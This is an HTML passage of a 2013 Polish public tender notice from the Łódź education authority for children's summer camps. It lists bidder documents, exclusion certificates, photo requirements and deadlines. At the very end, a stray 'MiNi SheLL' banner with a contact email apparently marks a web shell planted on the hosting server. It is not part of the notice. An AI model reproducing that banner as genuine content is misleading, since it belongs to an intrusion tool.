e) liczbę dzieci objętych zamówieniem (wypoczynkiem)
f)  wartość brutto usługi;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Fotografie: 
1. Aktualny wygląd zewnętrzny ośrodka, w tym jego ogrodzenie - co najmniej 4 szt. z różnych ujęć. 
2. Aktualne zdjęcie jadalni, 3 zdjęcia pokoi sypialnych w których będą zakwaterowane dzieci, 
        1 zdjęcie świetlicy, zdjęcia trzech łazienek pokazujące standard natrysku, umywalkę i wc, co 
        najmniej po 2 zdjęcia boisk lub obiektów sportowych oraz co najmniej 1 zdjęcie sali do 
        prowadzenia zajęć w ramach warsztatów i co najmniej 1 zdjęcie kąpieliska, z którego będą 
        korzystały dzieci.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu zamówienia lub umówionego terminu wykonania zamówienia w następujących przypadkach:
1. Zmiany terminu wykonania przedmiotu zamówienia, w szczególności w sytuacji wystąpienia 
      okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj. z powodu 
      okoliczności siły wyższej, wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, 
      którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub 
      zdrowiu ludzi lub grożącego powstaniem, szkody w znacznych rozmiarach. Zmiana terminu będzie 
      uzależniona od okresu działania siły wyższej oraz okresu potrzebnego do usunięcia skutków tego 
      działania.
2. Zmiana lokalizacji obiektu kolonijnego, w którym organizowane są kolonie letnie ze względu na 
     zaistnienie zdarzeń losowych, których nie można było przewidzieć na etapie składania ofert (np. 
     pożar, powódź) - w takim przypadku Wykonawca winien jest udokumentować Zamawiającemu 
     konieczność zmiany obiektu kolonijnego. Zmiana lokalizacji obiektu kolonijnego będzie możliwa, 
     o ile Wykonawca zaoferuje obiekt kolonijny o takim samym standardzie jak w złożonej ofercie 
     przetargowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kuratorium.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódzki Kurator Oświaty
90-446 Łódź
al. Kościuszki 120a
pok. 103.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 09:00, miejsce: Łódzki Kurator Oświaty
90-446 Łódź
al. Kościuszki 120a
pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com